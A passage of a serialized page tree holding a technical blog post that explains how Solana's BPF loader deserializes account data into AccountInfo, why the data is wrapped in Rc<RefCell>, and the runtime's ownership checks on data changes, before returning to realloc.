error",{"type":26,"tag":137,"props":17470,"children":17471},{"style":5590},[17472],{"type":32,"value":470},{"type":26,"tag":137,"props":17474,"children":17475},{"style":5682},[17476],{"type":32,"value":17477},"into",{"type":26,"tag":137,"props":17479,"children":17480},{"style":5601},[17481],{"type":32,"value":6082},{"type":26,"tag":137,"props":17483,"children":17484},{"class":5559,"line":5891},[17485],{"type":26,"tag":137,"props":17486,"children":17487},{"style":5601},[17488],{"type":32,"value":5945},{"type":26,"tag":137,"props":17490,"children":17491},{"class":5559,"line":5909},[17492],{"type":26,"tag":137,"props":17493,"children":17494},{"style":5601},[17495],{"type":32,"value":6507},{"type":26,"tag":35,"props":17497,"children":17498},{},[17499,17501,17506,17508,17514,17516,17523,17525,17531,17533,17540],{"type":32,"value":17500},"What we see here is the contract's real entrypoint - it takes a ",{"type":26,"tag":130,"props":17502,"children":17504},{"className":17503},[],[17505],{"type":32,"value":6012},{"type":32,"value":17507}," buffer in from the loader, and calls ",{"type":26,"tag":130,"props":17509,"children":17511},{"className":17510},[],[17512],{"type":32,"value":17513},"solana_program::entrypoint::deserialize",{"type":32,"value":17515},", which then ",{"type":26,"tag":41,"props":17517,"children":17520},{"href":17518,"rel":17519},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#281-337",[45],[17521],{"type":32,"value":17522},"parses out",{"type":32,"value":17524}," all the ",{"type":26,"tag":130,"props":17526,"children":17528},{"className":17527},[],[17529],{"type":32,"value":17530},"AccountInfo",{"type":32,"value":17532},"s, instruction data, and the current running program ID. We can see how the data buffer is ",{"type":26,"tag":41,"props":17534,"children":17537},{"href":17535,"rel":17536},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#308-316",[45],[17538],{"type":32,"value":17539},"laid out",{"type":32,"value":7072},{"type":26,"tag":5512,"props":17542,"children":17544},{"className":5552,"code":17543,"language":5551,"meta":7,"style":7},"#[allow(clippy::cast_ptr_alignment)]\nlet data_len = *(input.add(offset) as *const u64) as usize;\noffset += size_of::\u003Cu64>();\n\nlet data = Rc::new(RefCell::new({\n    from_raw_parts_mut(input.add(offset), data_len)\n}));\noffset += data_len + MAX_PERMITTED_DATA_INCREASE;\noffset += (offset as *const u8).align_offset(BPF_ALIGN_OF_U128); // padding\n",[17545],{"type":26,"tag":130,"props":17546,"children":17547},{"__ignoreMap":7},[17548,17565,17645,17678,17685,17733,17778,17786,17810],{"type":26,"tag":137,"props":17549,"children":17550},{"class":5559,"line":5560},[17551,17556,17560],{"type":26,"tag":137,"props":17552,"children":17553},{"style":5601},[17554],{"type":32,"value":17555},"#[allow(clippy",{"type":26,"tag":137,"props":17557,"children":17558},{"style":5590},[17559],{"type":32,"value":6072},{"type":26,"tag":137,"props":17561,"children":17562},{"style":5601},[17563],{"type":32,"value":17564},"cast_ptr_alignment)]\n",{"type":26,"tag":137,"props":17566,"children":17567},{"class":5559,"line":5412},[17568,17572,17577,17581,17585,17589,17593,17597,17601,17605,17609,17613,17617,17621,17625,17629,17633,17637,17641],{"type":26,"tag":137,"props":17569,"children":17570},{"style":5573},[17571],{"type":32,"value":14378},{"type":26,"tag":137,"props":17573,"children":17574},{"style":5584},[17575],{"type":32,"value":17576}," data_len",{"type":26,"tag":137,"props":17578,"children":17579},{"style":5590},[17580],{"type":32,"value":5593},{"type":26,"tag":137,"props":17582,"children":17583},{"style":5590},[17584],{"type":32,"value":12406},{"type":26,"tag":137,"props":17586,"children":17587},{"style":5601},[17588],{"type":32,"value":165},{"type":26,"tag":137,"props":17590,"children":17591},{"style":5584},[17592],{"type":32,"value":10952},{"type":26,"tag":137,"props":17594,"children":17595},{"style":5590},[17596],{"type":32,"value":470},{"type":26,"tag":137,"props":17598,"children":17599},{"style":5682},[17600],{"type":32,"value":12227},{"type":26,"tag":137,"props":17602,"children":17603},{"style":5601},[17604],{"type":32,"value":165},{"type":26,"tag":137,"props":17606,"children":17607},{"style":5584},[17608],{"type":32,"value":16492},{"type":26,"tag":137,"props":17610,"children":17611},{"style":5601},[17612],{"type":32,"value":5671},{"type":26,"tag":137,"props":17614,"children":17615},{"style":5573},[17616],{"type":32,"value":11428},{"type":26,"tag":137,"props":17618,"children":17619},{"style":5590},[17620],{"type":32,"value":12406},{"type":26,"tag":137,"props":17622,"children":17623},{"style":5573},[17624],{"type":32,"value":12244},{"type":26,"tag":137,"props":17626,"children":17627},{"style":6009},[17628],{"type":32,"value":8445},{"type":26,"tag":137,"props":17630,"children":17631},{"style":5601},[17632],{"type":32,"value":5671},{"type":26,"tag":137,"props":17634,"children":17635},{"style":5573},[17636],{"type":32,"value":11428},{"type":26,"tag":137,"props":17638,"children":17639},{"style":6009},[17640],{"type":32,"value":16322},{"type":26,"tag":137,"props":17642,"children":17643},{"style":5601},[17644],{"type":32,"value":5604},{"type":26,"tag":137,"props":17646,"children":17647},{"class":5559,"line":5417},[17648,17652,17657,17662,17666,17670,17674],{"type":26,"tag":137,"props":17649,"children":17650},{"style":5584},[17651],{"type":32,"value":16492},{"type":26,"tag":137,"props":17653,"children":17654},{"style":5590},[17655],{"type":32,"value":17656}," +=",{"type":26,"tag":137,"props":17658,"children":17659},{"style":5682},[17660],{"type":32,"value":17661}," size_of",{"type":26,"tag":137,"props":17663,"children":17664},{"style":5590},[17665],{"type":32,"value":6072},{"type":26,"tag":137,"props":17667,"children":17668},{"style":5601},[17669],{"type":32,"value":8391},{"type":26,"tag":137,"props":17671,"children":17672},{"style":6009},[17673],{"type":32,"value":10627},{"type":26,"tag":137,"props":17675,"children":17676},{"style":5601},[17677],{"type":32,"value":11037},{"type":26,"tag":137,"props":17679,"children":17680},{"class":5559,"line":5642},[17681],{"type":26,"tag":137,"props":17682,"children":17683},{"emptyLinePlaceholder":18},[17684],{"type":32,"value":6276},{"type":26,"tag":137,"props":17686,"children":17687},{"class":5559,"line":5745},[17688,17692,17697,17701,17706,17710,17715,17720,17724,17728],{"type":26,"tag":137,"props":17689,"children":17690},{"style":5573},[17691],{"type":32,"value":14378},{"type":26,"tag":137,"props":17693,"children":17694},{"style":5584},[17695],{"type":32,"value":17696}," data",{"type":26,"tag":137,"props":17698,"children":17699},{"style":5590},[17700],{"type":32,"value":5593},{"type":26,"tag":137,"props":17702,"children":17703},{"style":6009},[17704],{"type":32,"value":17705}," Rc",{"type":26,"tag":137,"props":17707,"children":17708},{"style":5590},[17709],{"type":32,"value":6072},{"type":26,"tag":137,"props":17711,"children":17712},{"style":5682},[17713],{"type":32,"value":17714},"new",{"type":26,"tag":137,"props":17716,"children":17717},{"style":5601},[17718],{"type":32,"value":17719},"(RefCell",{"type":26,"tag":137,"props":17721,"children":17722},{"style":5590},[17723],{"type":32,"value":6072},{"type":26,"tag":137,"props":17725,"children":17726},{"style":5682},[17727],{"type":32,"value":17714},{"type":26,"tag":137,"props":17729,"children":17730},{"style":5601},[17731],{"type":32,"value":17732},"({\n",{"type":26,"tag":137,"props":17734,"children":17735},{"class":5559,"line":5850},[17736,17741,17745,17749,17753,17757,17761,17765,17770,17774],{"type":26,"tag":137,"props":17737,"children":17738},{"style":5682},[17739],{"type":32,"value":17740},"    from_raw_parts_mut",{"type":26,"tag":137,"props":17742,"children":17743},{"style":5601},[17744],{"type":32,"value":165},{"type":26,"tag":137,"props":17746,"children":17747},{"style":5584},[17748],{"type":32,"value":10952},{"type":26,"tag":137,"props":17750,"children":17751},{"style":5590},[17752],{"type":32,"value":470},{"type":26,"tag":137,"props":17754,"children":17755},{"style":5682},[17756],{"type":32,"value":12227},{"type":26,"tag":137,"props":17758,"children":17759},{"style":5601},[17760],{"type":32,"value":165},{"type":26,"tag":137,"props":17762,"children":17763},{"style":5584},[17764],{"type":32,"value":16492},{"type":26,"tag":137,"props":17766,"children":17767},{"style":5601},[17768],{"type":32,"value":17769},"), ",{"type":26,"tag":137,"props":17771,"children":17772},{"style":5584},[17773],{"type":32,"value":16397},{"type":26,"tag":137,"props":17775,"children":17776},{"style":5601},[17777],{"type":32,"value":5742},{"type":26,"tag":137,"props":17779,"children":17780},{"class":5559,"line":5878},[17781],{"type":26,"tag":137,"props":17782,"children":17783},{"style":5601},[17784],{"type":32,"value":17785},"}));\n",{"type":26,"tag":137,"props":17787,"children":17788},{"class":5559,"line":5891},[17789,17793,17797,17801,17805],{"type":26,"tag":137,"props":17790,"children":17791},{"style":5584},[17792],{"type":32,"value":16492},{"type":26,"tag":137,"props":17794,"children":17795},{"style":5590},[17796],{"type":32,"value":17656},{"type":26,"tag":137,"props":17798,"children":17799},{"style":5584},[17800],{"type":32,"value":17576},{"type":26,"tag":137,"props":17802,"children":17803},{"style":5590},[17804],{"type":32,"value":11491},{"type":26,"tag":137,"props":17806,"children":17807},{"style":5601},[17808],{"type":32,"value":17809}," MAX_PERMITTED_DATA_INCREASE;\n",{"type":26,"tag":137,"props":17811,"children":17812},{"class":5559,"line":5909},[17813,17817,17821,17825,17829,17833,17837,17841,17845,17849,17853,17858,17863],{"type":26,"tag":137,"props":17814,"children":17815},{"style":5584},[17816],{"type":32,"value":16492},{"type":26,"tag":137,"props":17818,"children":17819},{"style":5590},[17820],{"type":32,"value":17656},{"type":26,"tag":137,"props":17822,"children":17823},{"style":5601},[17824],{"type":32,"value":4625},{"type":26,"tag":137,"props":17826,"children":17827},{"style":5584},[17828],{"type":32,"value":16492},{"type":26,"tag":137,"props":17830,"children":17831},{"style":5573},[17832],{"type":32,"value":11414},{"type":26,"tag":137,"props":17834,"children":17835},{"style":5590},[17836],{"type":32,"value":12406},{"type":26,"tag":137,"props":17838,"children":17839},{"style":5573},[17840],{"type":32,"value":12244},{"type":26,"tag":137,"props":17842,"children":17843},{"style":6009},[17844],{"type":32,"value":17225},{"type":26,"tag":137,"props":17846,"children":17847},{"style":5601},[17848],{"type":32,"value":200},{"type":26,"tag":137,"props":17850,"children":17851},{"style":5590},[17852],{"type":32,"value":470},{"type":26,"tag":137,"props":17854,"children":17855},{"style":5682},[17856],{"type":32,"value":17857},"align_offset",{"type":26,"tag":137,"props":17859,"children":17860},{"style":5601},[17861],{"type":32,"value":17862},"(BPF_ALIGN_OF_U128); ",{"type":26,"tag":137,"props":17864,"children":17865},{"style":5564},[17866],{"type":32,"value":17867},"// padding\n",{"type":26,"tag":35,"props":17869,"children":17870},{},[17871,17873,17878,17880,17886,17888,17899,17901,17906,17908,17914,17916,17922,17924,17930],{"type":32,"value":17872},"In English, we have the length of the data, as a ",{"type":26,"tag":130,"props":17874,"children":17876},{"className":17875},[],[17877],{"type":32,"value":10627},{"type":32,"value":17879},", followed immediately by the data, and an additional ",{"type":26,"tag":130,"props":17881,"children":17883},{"className":17882},[],[17884],{"type":32,"value":17885},"MAX_PERMITTED_DATA_INCREASE",{"type":32,"value":17887}," of reserve space (+ padding) after that. Using the length and data pointer, we construct a Rust slice reference (",{"type":26,"tag":41,"props":17889,"children":17892},{"href":17890,"rel":17891},"https://doc.rust-lang.org/std/slice/fn.from_raw_parts_mut.html",[45],[17893],{"type":26,"tag":130,"props":17894,"children":17896},{"className":17895},[],[17897],{"type":32,"value":17898},"slice::from_raw_parts_mut",{"type":32,"value":17900},") - slices are how Rust represents a, well, ",{"type":26,"tag":762,"props":17902,"children":17903},{},[17904],{"type":32,"value":17905},"slice",{"type":32,"value":17907}," (contiguous chunk) of memory - then wrap it up inside a ",{"type":26,"tag":130,"props":17909,"children":17911},{"className":17910},[],[17912],{"type":32,"value":17913},"Rc\u003CRefCell\u003CT>>",{"type":32,"value":17915},", giving us the unwieldy-looking type of ",{"type":26,"tag":130,"props":17917,"children":17919},{"className":17918},[],[17920],{"type":32,"value":17921},"AccountInfo.data",{"type":32,"value":17923},": ",{"type":26,"tag":130,"props":17925,"children":17927},{"className":17926},[],[17928],{"type":32,"value":17929},"Rc\u003CRefCell\u003C&mut [u8]>>",{"type":32,"value":470},{"type":26,"tag":35,"props":17932,"children":17933},{},[17934,17936,17943],{"type":32,"value":17935},"Now, what's the point of this complicated type? That's because when the same account is passed in multiple times to a program, instead of duplicating the data for the account, the BPF loader simply refers back to the first instance of the account. On the Rust side, that corresponds to ",{"type":26,"tag":41,"props":17937,"children":17940},{"href":17938,"rel":17939},"https://docs.rs/solana-program/1.10.28/src/solana_program/entrypoint.rs.html#335-336",[45],[17941],{"type":32,"value":17942},"cloning the referenced account",{"type":32,"value":7072},{"type":26,"tag":5512,"props":17945,"children":17947},{"className":5552,"code":17946,"language":5551,"meta":7,"style":7},"// Duplicate account, clone the original\naccounts.push(accounts[dup_info as usize].clone());\n",[17948],{"type":26,"tag":130,"props":17949,"children":17950},{"__ignoreMap":7},[17951,17959],{"type":26,"tag":137,"props":17952,"children":17953},{"class":5559,"line":5560},[17954],{"type":26,"tag":137,"props":17955,"children":17956},{"style":5564},[17957],{"type":32,"value":17958},"// Duplicate account, clone the original\n",{"type":26,"tag":137,"props":17960,"children":17961},{"class":5559,"line":5412},[17962,17966,17970,17974,17978,17982,17986,17991,17995,17999,18003,18007,18012],{"type":26,"tag":137,"props":17963,"children":17964},{"style":5584},[17965],{"type":32,"value":17266},{"type":26,"tag":137,"props":17967,"children":17968},{"style":5590},[17969],{"type":32,"value":470},{"type":26,"tag":137,"props":17971,"children":17972},{"style":5682},[17973],{"type":32,"value":6416},{"type":26,"tag":137,"props":17975,"children":17976},{"style":5601},[17977],{"type":32,"value":165},{"type":26,"tag":137,"props":17979,"children":17980},{"style":5584},[17981],{"type":32,"value":17266},{"type":26,"tag":137,"props":17983,"children":17984},{"style":5601},[17985],{"type":32,"value":3016},{"type":26,"tag":137,"props":17987,"children":17988},{"style":5584},[17989],{"type":32,"value":17990},"dup_info",{"type":26,"tag":137,"props":17992,"children":17993},{"style":5573},[17994],{"type":32,"value":11414},{"type":26,"tag":137,"props":17996,"children":17997},{"style":6009},[17998],{"type":32,"value":16322},{"type":26,"tag":137,"props":18000,"children":18001},{"style":5601},[18002],{"type":32,"value":3079},{"type":26,"tag":137,"props":18004,"children":18005},{"style":5590},[18006],{"type":32,"value":470},{"type":26,"tag":137,"props":18008,"children":18009},{"style":5682},[18010],{"type":32,"value":18011},"clone",{"type":26,"tag":137,"props":18013,"children":18014},{"style":5601},[18015],{"type":32,"value":18016},"());\n",{"type":26,"tag":35,"props":18018,"children":18019},{},[18020,18022,18027,18029,18034,18036,18041,18043,18048,18049,18055,18057,18062,18064,18076,18078,18083],{"type":32,"value":18021},"Since ",{"type":26,"tag":130,"props":18023,"children":18025},{"className":18024},[],[18026],{"type":32,"value":6303},{"type":32,"value":18028}," inside the ",{"type":26,"tag":130,"props":18030,"children":18032},{"className":18031},[],[18033],{"type":32,"value":17530},{"type":32,"value":18035}," is a ",{"type":26,"tag":130,"props":18037,"children":18039},{"className":18038},[],[18040],{"type":32,"value":17913},{"type":32,"value":18042},", where the ",{"type":26,"tag":130,"props":18044,"children":18046},{"className":18045},[],[18047],{"type":32,"value":2064},{"type":32,"value":18035},{"type":26,"tag":130,"props":18050,"children":18052},{"className":18051},[],[18053],{"type":32,"value":18054},"&mut [u8]",{"type":32,"value":18056}," pointing at the actual data buffer, when we clone the ",{"type":26,"tag":130,"props":18058,"children":18060},{"className":18059},[],[18061],{"type":32,"value":17530},{"type":32,"value":18063},", we get a new reference",{"type":26,"tag":18065,"props":18066,"children":18067},"sup",{},[18068],{"type":26,"tag":41,"props":18069,"children":18074},{"href":18070,"ariaDescribedBy":18071,"dataFootnoteRef":7,"id":18073},"#user-content-fn-rc-refs",[18072],"footnote-label","user-content-fnref-rc-refs",[18075],{"type":32,"value":878},{"type":32,"value":18077}," to the slice pointing at the ",{"type":26,"tag":762,"props":18079,"children":18080},{},[18081],{"type":32,"value":18082},"same",{"type":32,"value":18084}," data buffer.",{"type":26,"tag":35,"props":18086,"children":18087},{},[18088,18090,18096,18098,18104],{"type":32,"value":18089},"And of course to uphold borrowing rules while having a shared pointer, we have interior mutability via ",{"type":26,"tag":130,"props":18091,"children":18093},{"className":18092},[],[18094],{"type":32,"value":18095},"RefCell",{"type":32,"value":18097}," to check the rules at runtime. (The ",{"type":26,"tag":130,"props":18099,"children":18101},{"className":18100},[],[18102],{"type":32,"value":18103},"lamports",{"type":32,"value":18105}," field is very similar, for essentially the same reason - we need to be able to mutate it, but it is also shared between multiple instances of the same account.)",{"type":26,"tag":35,"props":18107,"children":18108},{},[18109,18111,18117],{"type":32,"value":18110},"Changing the data of an account is done by simply writing to ",{"type":26,"tag":130,"props":18112,"children":18114},{"className":18113},[],[18115],{"type":32,"value":18116},"AccountInfo::data",{"type":32,"value":18118},", which, as we just saw, is basically a pointer into the serialized buffer from the runtime; after the program exits, the loader reads the buffer back in to look at what the new state of the accounts should be.",{"type":26,"tag":35,"props":18120,"children":18121},{},[18122,18124,18131],{"type":32,"value":18123},"This is also where the ",{"type":26,"tag":41,"props":18125,"children":18128},{"href":18126,"rel":18127},"https://github.com/solana-labs/solana/blob/9fb0e76dc276f88b79720112477383a120c61b8f/program-runtime/src/pre_account.rs",[45],[18129],{"type":32,"value":18130},"runtime validity checks",{"type":32,"value":18132}," are imposed.",{"type":26,"tag":5512,"props":18134,"children":18136},{"className":5552,"code":18135,"language":5551,"meta":7,"style":7},"// Only the owner may change account data\n//   and if the account is writable\n//   and if the account is not executable\nif !(program_id == pre.owner()\n    && is_writable  // line coverage used to get branch coverage\n    && !pre.executable())\n    && pre.data() != post.data()\n{\n    if pre.executable() {\n        return Err(InstructionError::ExecutableDataModified);\n    } else if is_writable {\n        return Err(InstructionError::ExternalAccountDataModified);\n    } else {\n        return Err(InstructionError::ReadonlyDataModified);\n    }\n}\n",[18137],{"type":26,"tag":130,"props":18138,"children":18139},{"__ignoreMap":7},[18140,18148,18156,18164,18206,18224,18253,18298,18305,18329,18364,18389,18421,18436,18468,18475],{"type":26,"tag":137,"props":18141,"children":18142},{"class":5559,"line":5560},[18143],{"type":26,"tag":137,"props":18144,"children":18145},{"style":5564},[18146],{"type":32,"value":18147},"// Only the owner may change account data\n",{"type":26,"tag":137,"props":18149,"children":18150},{"class":5559,"line":5412},[18151],{"type":26,"tag":137,"props":18152,"children":18153},{"style":5564},[18154],{"type":32,"value":18155},"//   and if the account is writable\n",{"type":26,"tag":137,"props":18157,"children":18158},{"class":5559,"line":5417},[18159],{"type":26,"tag":137,"props":18160,"children":18161},{"style":5564},[18162],{"type":32,"value":18163},"//   and if the account is not executable\n",{"type":26,"tag":137,"props":18165,"children":18166},{"class":5559,"line":5642},[18167,18172,18176,18180,18184,18188,18193,18197,18202],{"type":26,"tag":137,"props":18168,"children":18169},{"style":5610},[18170],{"type":32,"value":18171},"if",{"type":26,"tag":137,"props":18173,"children":18174},{"style":5590},[18175],{"type":32,"value":15455},{"type":26,"tag":137,"props":18177,"children":18178},{"style":5601},[18179],{"type":32,"value":165},{"type":26,"tag":137,"props":18181,"children":18182},{"style":5584},[18183],{"type":32,"value":17257},{"type":26,"tag":137,"props":18185,"children":18186},{"style":5590},[18187],{"type":32,"value":5866},{"type":26,"tag":137,"props":18189,"children":18190},{"style":5584},[18191],{"type":32,"value":18192}," pre",{"type":26,"tag":137,"props":18194,"children":18195},{"style":5590},[18196],{"type":32,"value":470},{"type":26,"tag":137,"props":18198,"children":18199},{"style":5682},[18200],{"type":32,"value":18201},"owner",{"type":26,"tag":137,"props":18203,"children":18204},{"style":5601},[18205],{"type":32,"value":10320},{"type":26,"tag":137,"props":18207,"children":18208},{"class":5559,"line":5745},[18209,18214,18219],{"type":26,"tag":137,"props":18210,"children":18211},{"style":5590},[18212],{"type":32,"value":18213},"    &&",{"type":26,"tag":137,"props":18215,"children":18216},{"style":5584},[18217],{"type":32,"value":18218}," is_writable",{"type":26,"tag":137,"props":18220,"children":18221},{"style":5564},[18222],{"type":32,"value":18223},"  // line coverage used to get branch coverage\n",{"type":26,"tag":137,"props":18225,"children":18226},{"class":5559,"line":5850},[18227,18231,18235,18239,18243,18248],{"type":26,"tag":137,"props":18228,"children":18229},{"style":5590},[18230],{"type":32,"value":18213},{"type":26,"tag":137,"props":18232,"children":18233},{"style":5590},[18234],{"type":32,"value":15455},{"type":26,"tag":137,"props":18236,"children":18237},{"style":5584},[18238],{"type":32,"value":5512},{"type":26,"tag":137,"props":18240,"children":18241},{"style":5590},[18242],{"type":32,"value":470},{"type":26,"tag":137,"props":18244,"children":18245},{"style":5682},[18246],{"type":32,"value":18247},"executable",{"type":26,"tag":137,"props":18249,"children":18250},{"style":5601},[18251],{"type":32,"value":18252},"())\n",{"type":26,"tag":137,"props":18254,"children":18255},{"class":5559,"line":5878},[18256,18260,18264,18268,18272,18276,18281,18286,18290,18294],{"type":26,"tag":137,"props":18257,"children":18258},{"style":5590},[18259],{"type":32,"value":18213},{"type":26,"tag":137,"props":18261,"children":18262},{"style":5584},[18263],{"type":32,"value":18192},{"type":26,"tag":137,"props":18265,"children":18266},{"style":5590},[18267],{"type":32,"value":470},{"type":26,"tag":137,"props":18269,"children":18270},{"style":5682},[18271],{"type":32,"value":6303},{"type":26,"tag":137,"props":18273,"children":18274},{"style":5601},[18275],{"type":32,"value":16634},{"type":26,"tag":137,"props":18277,"children":18278},{"style":5590},[18279],{"type":32,"value":18280},"!=",{"type":26,"tag":137,"props":18282,"children":18283},{"style":5584},[18284],{"type":32,"value":18285}," post",{"type":26,"tag":137,"props":18287,"children":18288},{"style":5590},[18289],{"type":32,"value":470},{"type":26,"tag":137,"props":18291,"children":18292},{"style":5682},[18293],{"type":32,"value":6303},{"type":26,"tag":137,"props":18295,"children":18296},{"style":5601},[18297],{"type":32,"value":10320},{"type":26,"tag":137,"props":18299,"children":18300},{"class":5559,"line":5891},[18301],{"type":26,"tag":137,"props":18302,"children":18303},{"style":5601},[18304],{"type":32,"value":13471},{"type":26,"tag":137,"props":18306,"children":18307},{"class":5559,"line":5909},[18308,18312,18316,18320,18324],{"type":26,"tag":137,"props":18309,"children":18310},{"style":5610},[18311],{"type":32,"value":14870},{"type":26,"tag":137,"props":18313,"children":18314},{"style":5584},[18315],{"type":32,"value":18192},{"type":26,"tag":137,"props":18317,"children":18318},{"style":5590},[18319],{"type":32,"value":470},{"type":26,"tag":137,"props":18321,"children":18322},{"style":5682},[18323],{"type":32,"value":18247},{"type":26,"tag":137,"props":18325,"children":18326},{"style":5601},[18327],{"type":32,"value":18328},"() {\n",{"type":26,"tag":137,"props":18330,"children":18331},{"class":5559,"line":5930},[18332,18337,18342,18346,18351,18355,18360],{"type":26,"tag":137,"props":18333,"children":18334},{"style":5610},[18335],{"type":32,"value":18336},"        return",{"type":26,"tag":137,"props":18338,"children":18339},{"style":6009},[18340],{"type":32,"value":18341}," Err",{"type":26,"tag":137,"props":18343,"children":18344},{"style":5601},[18345],{"type":32,"value":165},{"type":26,"tag":137,"props":18347,"children":18348},{"style":6009},[18349],{"type":32,"value":18350},"InstructionError",{"type":26,"tag":137,"props":18352,"children":18353},{"style":5590},[18354],{"type":32,"value":6072},{"type":26,"tag":137,"props":18356,"children":18357},{"style":6009},[18358],{"type":32,"value":18359},"ExecutableDataModified",{"type":26,"tag":137,"props":18361,"children":18362},{"style":5601},[18363],{"type":32,"value":6430},{"type":26,"tag":137,"props":18365,"children":18366},{"class":5559,"line":5939},[18367,18372,18376,18381,18385],{"type":26,"tag":137,"props":18368,"children":18369},{"style":5601},[18370],{"type":32,"value":18371},"    } ",{"type":26,"tag":137,"props":18373,"children":18374},{"style":5610},[18375],{"type":32,"value":5902},{"type":26,"tag":137,"props":18377,"children":18378},{"style":5610},[18379],{"type":32,"value":18380}," if",{"type":26,"tag":137,"props":18382,"children":18383},{"style":5584},[18384],{"type":32,"value":18218},{"type":26,"tag":137,"props":18386,"children":18387},{"style":5601},[18388],{"type":32,"value":5875},{"type":26,"tag":137,"props":18390,"children":18391},{"class":5559,"line":6191},[18392,18396,18400,18404,18408,18412,18417],{"type":26,"tag":137,"props":18393,"children":18394},{"style":5610},[18395],{"type":32,"value":18336},{"type":26,"tag":137,"props":18397,"children":18398},{"style":6009},[18399],{"type":32,"value":18341},{"type":26,"tag":137,"props":18401,"children":18402},{"style":5601},[18403],{"type":32,"value":165},{"type":26,"tag":137,"props":18405,"children":18406},{"style":6009},[18407],{"type":32,"value":18350},{"type":26,"tag":137,"props":18409,"children":18410},{"style":5590},[18411],{"type":32,"value":6072},{"type":26,"tag":137,"props":18413,"children":18414},{"style":6009},[18415],{"type":32,"value":18416},"ExternalAccountDataModified",{"type":26,"tag":137,"props":18418,"children":18419},{"style":5601},[18420],{"type":32,"value":6430},{"type":26,"tag":137,"props":18422,"children":18423},{"class":5559,"line":6208},[18424,18428,18432],{"type":26,"tag":137,"props":18425,"children":18426},{"style":5601},[18427],{"type":32,"value":18371},{"type":26,"tag":137,"props":18429,"children":18430},{"style":5610},[18431],{"type":32,"value":5902},{"type":26,"tag":137,"props":18433,"children":18434},{"style":5601},[18435],{"type":32,"value":5875},{"type":26,"tag":137,"props":18437,"children":18438},{"class":5559,"line":6225},[18439,18443,18447,18451,18455,18459,18464],{"type":26,"tag":137,"props":18440,"children":18441},{"style":5610},[18442],{"type":32,"value":18336},{"type":26,"tag":137,"props":18444,"children":18445},{"style":6009},[18446],{"type":32,"value":18341},{"type":26,"tag":137,"props":18448,"children":18449},{"style":5601},[18450],{"type":32,"value":165},{"type":26,"tag":137,"props":18452,"children":18453},{"style":6009},[18454],{"type":32,"value":18350},{"type":26,"tag":137,"props":18456,"children":18457},{"style":5590},[18458],{"type":32,"value":6072},{"type":26,"tag":137,"props":18460,"children":18461},{"style":6009},[18462],{"type":32,"value":18463},"ReadonlyDataModified",{"type":26,"tag":137,"props":18465,"children":18466},{"style":5601},[18467],{"type":32,"value":6430},{"type":26,"tag":137,"props":18469,"children":18470},{"class":5559,"line":6238},[18471],{"type":26,"tag":137,"props":18472,"children":18473},{"style":5601},[18474],{"type":32,"value":5945},{"type":26,"tag":137,"props":18476,"children":18477},{"class":5559,"line":6247},[18478],{"type":26,"tag":137,"props":18479,"children":18480},{"style":5601},[18481],{"type":32,"value":6507},{"type":26,"tag":118,"props":18483,"children":18485},{"id":18484},"back-to-realloc",[18486,18488],{"type":32,"value":18487},"Back to ",{"type":26,"tag":130,"props":18489,"children":18491},{"className":18490},[],[18492],{"type":32,"value":16229},{"type":26,"tag":35,"props":18494,"children":18495},{},[18496],{"type":32,"value":18497},"As a reminder, this is what we were looking at before that detour:",{"type":26,"tag":5512,"props":18499,"children":18500},{"className":5552,"code":16982,"language":5551,"meta":7,"style":7},[18501],{"type":26,"tag":130,"props":18502,"children":18503},{"__ignoreMap":7},[18504,18511,18598],{"type":26,"tag":137,"props":18505,"children":18506},{"class":5559,"line":5560},[18507],{"type":26,"tag":137,"props":18508,"children":18509},{"style":5564},[18510],{"type":32,"value":16994},{"type":26,"tag":137,"props":18512,"children":18513},{"class":5559,"line":5412},[18514,18518,18522,18526,18530,18534,18538,18542,18546,18550,18554,18558,18562,18566,18570,18574,18578,18582,18586,18590,18594],{"type":26,"tag":137,"props":18515,"children":18516},{"style":5573},[18517],{"type":32,"value":14378},{"type":26,"tag":137,"props":18519,"children":18520},{"style":5584},[18521],{"type":32,"value":16448},{"type":26,"tag":137,"props":18523,"children":18524},{"style":5590},[18525],{"type":32,"value":5593},{"type":26,"tag":137,"props":18527,"children":18528},{"style":5573},[18529],{"type":32,"value":16388},{"type":26,"tag":137,"props":18531,"children":18532},{"style":5590},[18533],{"type":32,"value":470},{"type":26,"tag":137,"props":18535,"children":18536},{"style":5682},[18537],{"type":32,"value":16465},{"type":26,"tag":137,"props":18539,"children":18540},{"style":5601},[18541],{"type":32,"value":16470},{"type":26,"tag":137,"props":18543,"children":18544},{"style":5590},[18545],{"type":32,"value":5715},{"type":26,"tag":137,"props":18547,"children":18548},{"style":5682},[18549],{"type":32,"value":16479},{"type":26,"tag":137,"props":18551,"children":18552},{"style":5601},[18553],{"type":32,"value":16470},{"type":26,"tag":137,"props":18555,"children":18556},{"style":5590},[18557],{"type":32,"value":470},{"type":26,"tag":137,"props":18559,"children":18560},{"style":5682},[18561],{"type":32,"value":16492},{"type":26,"tag":137,"props":18563,"children":18564},{"style":5601},[18565],{"type":32,"value":165},{"type":26,"tag":137,"props":18567,"children":18568},{"style":5590},[18569],{"type":32,"value":6908},{"type":26,"tag":137,"props":18571,"children":18572},{"style":5626},[18573],{"type":32,"value":6663},{"type":26,"tag":137,"props":18575,"children":18576},{"style":5601},[18577],{"type":32,"value":5671},{"type":26,"tag":137,"props":18579,"children":18580},{"style":5573},[18581],{"type":32,"value":11428},{"type":26,"tag":137,"props":18583,"children":18584},{"style":5590},[18585],{"type":32,"value":12406},{"type":26,"tag":137,"props":18587,"children":18588},{"style":5573},[18589],{"type":32,"value":6325},{"type":26,"tag":137,"props":18591,"children":18592},{"style":6009},[18593],{"type":32,"value":8445},{"type":26,"tag":137,"props":18595,"children":18596},{"style":5601},[18597],{"type":32,"value":5604},{"type":26,"tag":137,"props":18599,"children":18600},{"class":5559,"line":5417},[18601,18605,18609,18613,18617,18621,18625],{"type":26,"tag":137,"props":18602,"children":18603},{"style":5590},[18604],{"type":32,"value":7152},{"type":26,"tag":137,"props":18606,"children":18607},{"style":5584},[18608],{"type":32,"value":16540},{"type":26,"tag":137,"props":18610,"children":18611},{"style":5590},[18612],{"type":32,"value":5593},{"type":26,"tag":137,"props":18614,"children":18615},{"style":5584},[18616],{"type":32,"value":16549},{"type":26,"tag":137,"props":18618,"children":18619},{"style":5573},[18620],{"type":32,"value":11414},{"type":26,"tag":137,"props":18622,"children":18623},{"style":6009},[18624],{"type":32,"value":8445},{"type":26,"tag":137,"props":18626,"children":18627},{"style":5601},[18628],{"type":32,"value":5604},{"type":26,"tag":35,"props":18630,"children":18631},{},[18632,18637,18639,18644,